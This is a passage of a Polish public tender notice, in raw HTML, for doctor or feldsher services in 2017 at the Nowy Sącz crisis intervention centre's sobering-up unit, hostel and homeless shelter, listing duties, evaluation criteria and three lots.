                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe w świadczeniu usług medycznych w zakresie pomocy osobom będącym w stanie nietrzeźwości</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/12/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia do 31 grudnia w 2017 roku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
Załącznik nr 1 do SIWZ



Przedmiot zamówienia publicznego pn;

Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie 
od 01 stycznia do 31 grudnia w 2017 roku 



I. Przedmiotem zamówienia jest świadczenie przez Wykonawcę będącego lekarzem lub felczerem usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia 2017 r. do 31 grudnia 2017 r.
1. usług medycznych osobom nietrzeźwym, doprowadzonym do Sądeckiego Ośrodka Interwencji Kryzysowej  Działu Opieki Nad Osobami Nietrzeźwymi w Nowym Sączu zwanym dalej DONON, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2.zapewnienie  całodobowej opieki medycznej nad osobami doprowadzonymi do wytrzeźwienia w dziale DONON, 
3.ocena stanu zdrowia osób:
- przyjmowanych do hostelu dla osób znajdujących się w sytuacji ostrego kryzysu związanego z zagrożeniem zdrowia i życia oraz ofiar przemocy - Dział Wsparcia i Interwencji w Sytuacjach Kryzysowych, ul. Śniadeckich 10a, 33-300 Nowy Sącz
- przyjmowanych do noclegowni dla osób bezdomnych - Dział Readaptacji Społecznej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, 
oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

II.  Do obowiązków Wykonawcy będzie należało przede wszystkim: 

1.  Udzielanie świadczeń zdrowotnych osobom doprowadzonym do wytrzeźwienia przez funkcjonariuszy Policji i strażników Straży Miejskiej, w zakresie wynikającym 
z rozporządzenia Ministra Zdrowia z dnia 08 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2. Określanie i pisemne potwierdzanie dodatkowych symptomów wskazujących na stan nietrzeźwości, zgodnie z Rozporządzenia Ministra Zdrowia z dnia 8 grudnia 2014 r. 
w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
3. Stwierdzenie po przeprowadzeniu badania  u osoby doprowadzonej czy:
a) istnieją medyczne przesłanki do umieszczenia osoby doprowadzonej w Dziale Opieki Nad Osobami Nietrzeźwymi  zwanym dalej DONON,  zastosowania pomocy doraźnej, która może być udzielona -w DONON, wykonania zabiegów higieniczno  sanitarnych, uwzględniając objawy stanu nietrzeźwości albo, 
b) istnieją medyczne przesłanki do skierowania do szpitala lub innego publicznego zakładu opieki zdrowotnej  uwzględniając objawy stanu nietrzeźwości osoby doprowadzonej oraz określenia  wskazań do hospitalizacji albo,
c) istnieje brak objawów stanu nietrzeźwości uzasadniających umieszczenie w DONON albo,
d) istnieje brak przeciwwskazań do umieszczenia w DONON.

4. Uwzględnienie przez Wykonawcę, iż nie przyjmuje się do DONON  osób doprowadzonych do wytrzeźwienia jeżeli: 
      a) stan zdrowia osoby doprowadzonej wg opinii Wykonawcy wymaga zastosowania środków, którymi Zamawiający nie dysponuje lub które powinny być zastosowane
w publicznym zakładzie opieki zdrowotnej przez lekarza specjalistę,
      b) brak jest wolnych miejsc w DONON.

5. Dokonanie koniecznych zabiegów medycznych do czasu wytrzeźwienia lub usunięcia skutków zatrucia alkoholem osób doprowadzonych do wytrzeźwienia.

6. Sprawowanie nadzoru medycznego nad osobami nietrzeźwymi do wytrzeźwienia
 i  przeprowadzanie w tym celu obchodu sal.

7. Podejmowanie decyzji o zastosowaniu przymusu bezpośredniego z zachowaniem zasad określonych art. 18 Ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego  
(t.j. Dz. U. z 2016 poz. 546 ), oraz przeprowadzenie każdorazowo badań po zastosowaniu pasów bezpieczeństwa.

8.  Pobieranie krwi na zawartość alkoholu zgodnie z Rozporządzeniem Ministra Zdrowia 
 z dnia 11 grudnia 2015 r. w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 
 z  2015 poz 2153).

9. Przeprowadzenie z osobami zwalnianymi z DONON rozmów profilaktyczno  wychowawczych o szkodliwości nadużywania napojów alkoholowych.

10. Zastosowanie przez Wykonawcę, przed opuszczeniem przez osobę doprowadzoną do DONON, zabiegów medycznych, niezbędnych ze względu na stan zdrowia osoby doprowadzonej.

11.Prowadzenie przez Wykonawcę pełnej dokumentacji medycznej, zgodnie
 z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850), oraz  Rozporządzeniem Ministra Zdrowia z dnia 9 listopada 2015 r.
w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania 
(tj. Dz. U. z 2015 r. poz. 2069 z późn. zm.), a w szczególności:

a) sporządzanie przez Wykonawcę raportów z przebiegu dyżurów z uwzględnieniem liczby przyjętych osób, wydanych leków oraz wszystkich zaistniałych okoliczności podczas trwania dyżuru, 

b) wypełnianie przez Wykonawcę kart pobytu w DONON zgodnie z ustalonym wzorem obowiązek ten dotyczy zapisów stanu z przyjęcia i zwolnienia, oraz stanów i zachowań podczas pobytu, w tym zapisów określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),

12. Zgłaszanie przez Wykonawcę zapotrzebowania na brakujące w ambulatorium leki, środki opatrunkowe zgodnie z wykazem leków oraz sprzętu określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),. 

13. Dokonanie oceny stanu zdrowia osób przyjmowanych  do hostelu dla ofiar przemocy 
 i do noclegowni dla osób bezdomnych   oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

14.  Sporządzanie raportu z przebiegu dyżurów z uwzględnieniem ilości przyjętych i wypisanych pacjentów oraz innych istotnych okoliczności i zdarzeń.

15. Wykonywanie innych niezbędnych czynności  medycznych.

16. Przestrzeganie tajemnicy służbowej i przepisów BHP, ppoż. obowiązujących w siedzibie Zamawiającego wraz z pełną odpowiedzialnością za ich realizację.

III. Niezależnie od wykonywania usług medycznych określonych w pkt II  Wykonawca 
zobowiązany jest w godz. 20.00 do 7.00 podejmować rozmowy telefoniczne z osobami potrzebującymi w danej chwili wsparcia oraz w razie potrzeby umawiać te osoby ze specjalistami, odnotowując ten fakt w książce raportów.

Obejmuje wykonywanie przedmiotu zamówienia przez 2496 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku w każdy piątek od godziny 7.00 do niedzieli  godz. 7:00
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85121100-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe w zakresie pomocy osobom będącym w stanie nietrzeźwości</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia do 31 grudnia w 2017 roku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
Załącznik nr 1 do SIWZ



Przedmiot zamówienia publicznego pn;

Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie 
od 01 stycznia do 31 grudnia w 2017 roku 



I. Przedmiotem zamówienia jest świadczenie przez Wykonawcę będącego lekarzem lub felczerem usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia 2017 r. do 31 grudnia 2017 r.
1. usług medycznych osobom nietrzeźwym, doprowadzonym do Sądeckiego Ośrodka Interwencji Kryzysowej  Działu Opieki Nad Osobami Nietrzeźwymi w Nowym Sączu zwanym dalej DONON, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2.zapewnienie  całodobowej opieki medycznej nad osobami doprowadzonymi do wytrzeźwienia w dziale DONON, 
3.ocena stanu zdrowia osób:
- przyjmowanych do hostelu dla osób znajdujących się w sytuacji ostrego kryzysu związanego z zagrożeniem zdrowia i życia oraz ofiar przemocy - Dział Wsparcia i Interwencji w Sytuacjach Kryzysowych, ul. Śniadeckich 10a, 33-300 Nowy Sącz
- przyjmowanych do noclegowni dla osób bezdomnych - Dział Readaptacji Społecznej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, 
oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

II.  Do obowiązków Wykonawcy będzie należało przede wszystkim: 

1.  Udzielanie świadczeń zdrowotnych osobom doprowadzonym do wytrzeźwienia przez funkcjonariuszy Policji i strażników Straży Miejskiej, w zakresie wynikającym 
z rozporządzenia Ministra Zdrowia z dnia 08 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2. Określanie i pisemne potwierdzanie dodatkowych symptomów wskazujących na stan nietrzeźwości, zgodnie z Rozporządzenia Ministra Zdrowia z dnia 8 grudnia 2014 r. 
w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
3. Stwierdzenie po przeprowadzeniu badania  u osoby doprowadzonej czy:
a) istnieją medyczne przesłanki do umieszczenia osoby doprowadzonej w Dziale Opieki Nad Osobami Nietrzeźwymi  zwanym dalej DONON,  zastosowania pomocy doraźnej, która może być udzielona -w DONON, wykonania zabiegów higieniczno  sanitarnych, uwzględniając objawy stanu nietrzeźwości albo, 
b) istnieją medyczne przesłanki do skierowania do szpitala lub innego publicznego zakładu opieki zdrowotnej  uwzględniając objawy stanu nietrzeźwości osoby doprowadzonej oraz określenia  wskazań do hospitalizacji albo,
c) istnieje brak objawów stanu nietrzeźwości uzasadniających umieszczenie w DONON albo,
d) istnieje brak przeciwwskazań do umieszczenia w DONON.

4. Uwzględnienie przez Wykonawcę, iż nie przyjmuje się do DONON  osób doprowadzonych do wytrzeźwienia jeżeli: 
      a) stan zdrowia osoby doprowadzonej wg opinii Wykonawcy wymaga zastosowania środków, którymi Zamawiający nie dysponuje lub które powinny być zastosowane
w publicznym zakładzie opieki zdrowotnej przez lekarza specjalistę,
      b) brak jest wolnych miejsc w DONON.

5. Dokonanie koniecznych zabiegów medycznych do czasu wytrzeźwienia lub usunięcia skutków zatrucia alkoholem osób doprowadzonych do wytrzeźwienia.

6. Sprawowanie nadzoru medycznego nad osobami nietrzeźwymi do wytrzeźwienia
 i  przeprowadzanie w tym celu obchodu sal.

7. Podejmowanie decyzji o zastosowaniu przymusu bezpośredniego z zachowaniem zasad określonych art. 18 Ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego  
(t.j. Dz. U. z 2016 poz. 546 ), oraz przeprowadzenie każdorazowo badań po zastosowaniu pasów bezpieczeństwa.

8.  Pobieranie krwi na zawartość alkoholu zgodnie z Rozporządzeniem Ministra Zdrowia 
 z dnia 11 grudnia 2015 r. w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 
 z  2015 poz 2153).

9. Przeprowadzenie z osobami zwalnianymi z DONON rozmów profilaktyczno  wychowawczych o szkodliwości nadużywania napojów alkoholowych.

10. Zastosowanie przez Wykonawcę, przed opuszczeniem przez osobę doprowadzoną do DONON, zabiegów medycznych, niezbędnych ze względu na stan zdrowia osoby doprowadzonej.

11.Prowadzenie przez Wykonawcę pełnej dokumentacji medycznej, zgodnie
 z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850), oraz  Rozporządzeniem Ministra Zdrowia z dnia 9 listopada 2015 r.
w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania 
(tj. Dz. U. z 2015 r. poz. 2069 z późn. zm.), a w szczególności:

a) sporządzanie przez Wykonawcę raportów z przebiegu dyżurów z uwzględnieniem liczby przyjętych osób, wydanych leków oraz wszystkich zaistniałych okoliczności podczas trwania dyżuru, 

b) wypełnianie przez Wykonawcę kart pobytu w DONON zgodnie z ustalonym wzorem obowiązek ten dotyczy zapisów stanu z przyjęcia i zwolnienia, oraz stanów i zachowań podczas pobytu, w tym zapisów określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),

12. Zgłaszanie przez Wykonawcę zapotrzebowania na brakujące w ambulatorium leki, środki opatrunkowe zgodnie z wykazem leków oraz sprzętu określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),. 

13. Dokonanie oceny stanu zdrowia osób przyjmowanych  do hostelu dla ofiar przemocy 
 i do noclegowni dla osób bezdomnych   oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

14.  Sporządzanie raportu z przebiegu dyżurów z uwzględnieniem ilości przyjętych i wypisanych pacjentów oraz innych istotnych okoliczności i zdarzeń.

15. Wykonywanie innych niezbędnych czynności  medycznych.

16. Przestrzeganie tajemnicy służbowej i przepisów BHP, ppoż. obowiązujących w siedzibie Zamawiającego wraz z pełną odpowiedzialnością za ich realizację.

III. Niezależnie od wykonywania usług medycznych określonych w pkt II  Wykonawca 
zobowiązany jest w godz. 20.00 do 7.00 podejmować rozmowy telefoniczne z osobami potrzebującymi w danej chwili wsparcia oraz w razie potrzeby umawiać te osoby ze specjalistami, odnotowując ten fakt w książce raportów.

obejmuje wykonywanie przedmiotu zamówienia przez 1896 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdą niedzielę od 7.00 do poniedziałku do godz. 19:00
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85121100-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe w  zakresie pomocy osobom będącym w stanie nietrzeźwosci</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie  od 01 stycznia do 31 grudnia w 2017 roku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>

I. Przedmiotem zamówienia jest świadczenie przez Wykonawcę będącego lekarzem lub felczerem usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia 2017 r. do 31 grudnia 2017 r.
1. usług medycznych osobom nietrzeźwym, doprowadzonym do Sądeckiego Ośrodka Interwencji Kryzysowej  Działu Opieki Nad Osobami Nietrzeźwymi w Nowym Sączu zwanym dalej DONON, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2.zapewnienie  całodobowej opieki medycznej nad osobami doprowadzonymi do wytrzeźwienia w dziale DONON, 
3.ocena stanu zdrowia osób:
- przyjmowanych do hostelu dla osób znajdujących się w sytuacji ostrego kryzysu związanego z zagrożeniem zdrowia i życia oraz ofiar przemocy - Dział Wsparcia i Interwencji w Sytuacjach Kryzysowych, ul. Śniadeckich 10a, 33-300 Nowy Sącz
- przyjmowanych do noclegowni dla osób bezdomnych - Dział Readaptacji Społecznej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, 
oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

II.  Do obowiązków Wykonawcy będzie należało przede wszystkim: 

1.  Udzielanie świadczeń zdrowotnych osobom doprowadzonym do wytrzeźwienia przez funkcjonariuszy Policji i strażników Straży Miejskiej, w zakresie wynikającym 
z rozporządzenia Ministra Zdrowia z dnia 08 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2. Określanie i pisemne potwierdzanie dodatkowych symptomów wskazujących na stan nietrzeźwości, zgodnie z Rozporządzenia Ministra Zdrowia z dnia 8 grudnia 2014 r. 
w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
3. Stwierdzenie po przeprowadzeniu badania  u osoby doprowadzonej czy:
a) istnieją medyczne przesłanki do umieszczenia osoby doprowadzonej w Dziale Opieki Nad Osobami Nietrzeźwymi  zwanym dalej DONON,  zastosowania pomocy doraźnej, która może być udzielona -w DONON, wykonania zabiegów higieniczno  sanitarnych, uwzględniając objawy stanu nietrzeźwości albo, 
b) istnieją medyczne przesłanki do skierowania do szpitala lub innego publicznego zakładu opieki zdrowotnej  uwzględniając objawy stanu nietrzeźwości osoby doprowadzonej oraz określenia  wskazań do hospitalizacji albo,
c) istnieje brak objawów stanu nietrzeźwości uzasadniających umieszczenie w DONON albo,
d) istnieje brak przeciwwskazań do umieszczenia w DONON.

4. Uwzględnienie przez Wykonawcę, iż nie przyjmuje się do DONON  osób doprowadzonych do wytrzeźwienia jeżeli: 
      a) stan zdrowia osoby doprowadzonej wg opinii Wykonawcy wymaga zastosowania środków, którymi Zamawiający nie dysponuje lub które powinny być zastosowane
w publicznym zakładzie opieki zdrowotnej przez lekarza specjalistę,
      b) brak jest wolnych miejsc w DONON.

5. Dokonanie koniecznych zabiegów medycznych do czasu wytrzeźwienia lub usunięcia skutków zatrucia alkoholem osób doprowadzonych do wytrzeźwienia.

6. Sprawowanie nadzoru medycznego nad osobami nietrzeźwymi do wytrzeźwienia
 i  przeprowadzanie w tym celu obchodu sal.

7. Podejmowanie decyzji o zastosowaniu przymusu bezpośredniego z zachowaniem zasad określonych art. 18 Ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego  
(t.j. Dz. U. z 2016 poz. 546 ), oraz przeprowadzenie każdorazowo badań po zastosowaniu pasów bezpieczeństwa.

8.  Pobieranie krwi na zawartość alkoholu zgodnie z Rozporządzeniem Ministra Zdrowia 
 z dnia 11 grudnia 2015 r. w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 
 z  2015 poz 2153).

9. Przeprowadzenie z osobami zwalnianymi z DONON rozmów profilaktyczno  wychowawczych o szkodliwości nadużywania napojów alkoholowych.

10. Zastosowanie przez Wykonawcę, przed opuszczeniem przez osobę doprowadzoną do DONON, zabiegów medycznych, niezbędnych ze względu na stan zdrowia osoby doprowadzonej.

11.Prowadzenie przez Wykonawcę pełnej dokumentacji medycznej, zgodnie
 z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850), oraz  Rozporządzeniem Ministra Zdrowia z dnia 9 listopada 2015 r.
w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania 
(tj. Dz. U. z 2015 r. poz. 2069 z późn. zm.), a w szczególności:

a) sporządzanie przez Wykonawcę raportów z przebiegu dyżurów z uwzględnieniem liczby przyjętych osób, wydanych leków oraz wszystkich zaistniałych okoliczności podczas trwania dyżuru, 

b) wypełnianie przez Wykonawcę kart pobytu w DONON zgodnie z ustalonym wzorem obowiązek ten dotyczy zapisów stanu z przyjęcia i zwolnienia, oraz stanów i zachowań podczas pobytu, w tym zapisów określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),

12. Zgłaszanie przez Wykonawcę zapotrzebowania na brakujące w ambulatorium leki, środki opatrunkowe zgodnie z wykazem leków oraz sprzętu określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),. 

